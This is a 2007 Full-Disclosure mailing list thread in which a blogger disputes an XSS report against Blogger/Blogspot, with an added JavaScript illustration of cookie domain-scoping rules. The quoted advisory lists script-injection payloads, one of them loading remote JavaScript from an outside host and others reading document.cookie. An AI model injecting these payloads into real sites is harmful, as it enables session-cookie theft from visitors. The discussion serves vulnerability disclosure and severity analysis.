Why is this a vulnerability? I can't see a way by which an attacker can insert JavaScript code into my blog.

> I've noticed that for any blog hosted at blogspot.com the cookie will
> not be shown.

The sensitive cookies are not maintained under blogspot.com, so allowing JavaScript in blogspot.com doesn't look like a threat or vulnerability.

> Otherwise, if the blog is located inside your web site, the cookie
> will be shown.

But I am the only one who is inserting the JavaScript in my blog. So, I'll end up stealing the cookies set for my domain. Why would I steal cookies set for my domain? I already know them because it is my website.

Regards,
Susam Pal
http://susam.in/

Daniele Costa wrote, On Saturday 11 August 2007 10:52 PM:
> ------------------------------------------------------
> BLOGGER XSS VULNERABILITY
> ------------------------------------------------------
>
> Blogspot.com
>
> Homepage: http://www.blogspot.com
>
> and
>
> Blogger.com
>
> Homepage: http://www.blogger.com
>
> Affected files:
>
> Post's Input boxes
>
> ------------------------------------------------------
> XSS DETAILS
> ------------------------------------------------------
> XSS vuln via injecting javascript code into any post.
>
> Blogger doesn't sanitize user input during post process.
> Try injecting the following code into a post
>
> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
>
> or just the well known
>
> <SCRIPT>alert(document.cookie);</SCRIPT>
>
> or
>
> <SCRIPT >alert(document.domain);</SCRIPT>
> <!-- COPIED IN REPLY -->
>
> ------------------------------------------------------
> Proof Of Concept
> ------------------------------------------------------
>
> http://pocasiculezza.blogspot.com/
>
> -----------------------------------------------------
> HISTORY
> ------------------------------------------------------
> Discovered : 07/11/2007 by Daniele Costa
> Published : 07/11/2007 by Daniele Costa
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
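The cookie-scoping point argued in this thread, as an added example that is not part of the original messages: it applies the RFC 6265 domain-match and path-match rules to decide which cookies a script on a given page can read through `document.cookie`. The cookie names, the `example.org` site and the scoping of the account cookie to `blogger.com` are assumptions constructed for illustration.

```javascript
// Added illustration; every cookie name and the example.org host are constructed.
// RFC 6265 5.1.3 domain-match: identical, or host ends with "." + cookie domain.
// (IP-address hosts are not handled here.)
function domainMatch(host, cookieDomain) {
  const h = host.toLowerCase();
  const d = cookieDomain.toLowerCase().replace(/^\./, "");
  return h === d || h.endsWith("." + d);
}

// RFC 6265 5.1.4 path-match: equal, or cookie path is a "/"-bounded prefix.
function pathMatch(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || reqPath[cookiePath.length] === "/";
}

// Names of the cookies a script running on pageUrl could read via document.cookie.
function visibleToScript(pageUrl, jar) {
  const u = new URL(pageUrl);
  return jar
    .filter((c) => !c.httpOnly) // HttpOnly cookies never reach script
    .filter((c) => !c.secure || u.protocol === "https:")
    .filter((c) => (c.hostOnly ? u.hostname === c.domain : domainMatch(u.hostname, c.domain)))
    .filter((c) => pathMatch(u.pathname, c.path))
    .map((c) => c.name);
}

// Constructed jar. Assumption: the account cookie lives on blogger.com, not on
// blogspot.com, as the reply states; the example.org cookies stand for a blog
// hosted inside the owner's own site.
const jar = [
  { name: "account_session", domain: "blogger.com", path: "/", hostOnly: false, httpOnly: false },
  { name: "blog_prefs", domain: "pocasiculezza.blogspot.com", path: "/", hostOnly: true, httpOnly: false },
  { name: "site_session", domain: "example.org", path: "/", hostOnly: false, httpOnly: false },
  { name: "site_admin", domain: "example.org", path: "/", hostOnly: false, httpOnly: true },
];

for (const page of [
  "http://pocasiculezza.blogspot.com/",
  "http://www.example.org/blog/post.html",
]) {
  console.log(page, visibleToScript(page, jar));
}
```

Under these assumptions a script in a blogspot.com post sees only that blog's own host cookie, while the same script on a blog served from inside a site sees that site's script-readable cookies; marking session cookies `HttpOnly` removes them from both results.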